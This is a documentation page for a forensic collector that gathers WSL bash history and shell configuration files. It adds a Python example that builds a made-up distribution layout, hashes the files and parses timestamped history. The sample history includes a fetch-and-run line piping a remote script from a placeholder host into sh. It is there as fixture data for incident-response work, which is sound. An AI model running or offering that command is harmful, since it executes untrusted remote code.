WSL
Overview
Evidence: WSL
Description: Collect Windows Subsystem for Linux Files
Category: Applications
Platform: windows
Short Name: wsl
Is Parsed: No
Sent to Investigation Hub: No
Collect File(s): Yes
Background
Windows Subsystem for Linux (WSL) stores Linux user files, including bash history, bash configuration, and logout scripts, in the WSL distribution’s file system. These files record Linux command history and shell configuration.
Data Collected
This collector gathers WSL shell artifacts: bash history, .bashrc configuration, and .bash_logout files from each WSL distribution.
Collection Method
This collector gathers the bash history, .bashrc configuration, and .bash_logout files from each WSL distribution package's LocalState directory.
Forensic Value
WSL files reveal Linux commands executed, scripts run, development activity, and potentially malicious commands issued through the Linux subsystem. Bash history is critical for identifying attacker activity, privilege escalation attempts, and data exfiltration through WSL.
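The following is an added example illustrating the Collection Method and Forensic Value sections; it is not the collector's own code. It builds a constructed WSL package layout in a temporary directory (package name, user name and history contents are all made up), locates the three shell files under each package's LocalState\rootfs tree, hashes them, and parses .bash_history into (timestamp, command) pairs using the `#<epoch>` lines bash writes when HISTTIMEFORMAT is set. The rootfs layout is the one used by WSL1 store distributions; as a caveat of my own, WSL2 distributions keep the filesystem inside an ext4.vhdx in the same LocalState folder, so such packages yield no directly readable shell files and the example skips them.

```python
"""Added example: locate and parse WSL bash shell artifacts (not the collector's own code)."""
import hashlib
import re
import tempfile
from pathlib import Path

# Files named by the collector description, relative to a home directory inside the distro rootfs.
TARGET_FILES = (".bash_history", ".bashrc", ".bash_logout")

# Constructed sample history: bash prefixes each command with "#<epoch>" when HISTTIMEFORMAT is set.
SAMPLE_HISTORY = (
    "#1700000000\nls -la\n"
    "#1700000060\nsudo apt install nmap\n"
    "#1700000120\ncurl http://example.invalid/x.sh | sh\n"
)


def build_sample_localstate(root: Path) -> Path:
    """Create a constructed WSL1-style layout: Packages/<pkg>/LocalState/rootfs/{home/<user>,root}."""
    pkg = root / "Packages" / "CanonicalGroupLimited.Ubuntu_constructed"  # constructed package name
    rootfs = pkg / "LocalState" / "rootfs"
    alice = rootfs / "home" / "alice"
    alice.mkdir(parents=True)
    (alice / ".bash_history").write_text(SAMPLE_HISTORY)
    (alice / ".bashrc").write_text("export PATH=$PATH:/opt/tools\nalias ll='ls -la'\n")
    (alice / ".bash_logout").write_text("clear\n")
    root_home = rootfs / "root"
    root_home.mkdir()
    (root_home / ".bash_history").write_text("whoami\n")  # no timestamps: HISTTIMEFORMAT unset
    return root / "Packages"


def find_wsl_shell_files(packages_dir: Path):
    """Yield (package name, account, path) for every target file under each package's LocalState/rootfs."""
    for localstate in sorted(packages_dir.glob("*/LocalState")):
        rootfs = localstate / "rootfs"
        if not rootfs.is_dir():
            # Assumption/caveat: a WSL2 package stores its disk as LocalState/ext4.vhdx, so there is
            # no rootfs tree to read; a file-level collector cannot reach its shell files directly.
            continue
        homes = sorted((rootfs / "home").glob("*")) + [rootfs / "root"]
        for home in homes:
            for name in TARGET_FILES:
                path = home / name
                if path.is_file():
                    yield localstate.parent.name, home.name, path


def sha256_file(path: Path) -> str:
    """Hash the collected file so the evidence can be integrity-checked later."""
    return hashlib.sha256(path.read_bytes()).hexdigest()


def parse_bash_history(text: str):
    """Return [(epoch_or_None, command), ...]; a '#<epoch>' line timestamps the command that follows it."""
    entries, pending_ts = [], None
    for line in text.splitlines():
        m = re.fullmatch(r"#(\d{9,10})", line)
        if m:
            pending_ts = int(m.group(1))
            continue
        if not line.strip():
            continue
        entries.append((pending_ts, line))
        pending_ts = None
    return entries


def collect(packages_dir: Path):
    """Build one record per collected file; history files additionally carry parsed commands."""
    records = []
    for distro, account, path in find_wsl_shell_files(packages_dir):
        rec = {"distro": distro, "account": account, "file": path.name, "sha256": sha256_file(path)}
        if path.name == ".bash_history":
            rec["commands"] = parse_bash_history(path.read_text(errors="replace"))
        records.append(rec)
    return records


def demo():
    """Run the collector over the constructed sample tree and return its records."""
    with tempfile.TemporaryDirectory() as tmp:
        return collect(build_sample_localstate(Path(tmp)))


if __name__ == "__main__":
    for record in demo():
        print(record)
```

On a live system the `packages_dir` argument would be the user's %LOCALAPPDATA%\Packages folder; the example keeps everything inside a temporary directory so it runs offline. Timestamps are only present when the distro's shell had HISTTIMEFORMAT set, so the parser returns None for the root account's untimed entry rather than guessing.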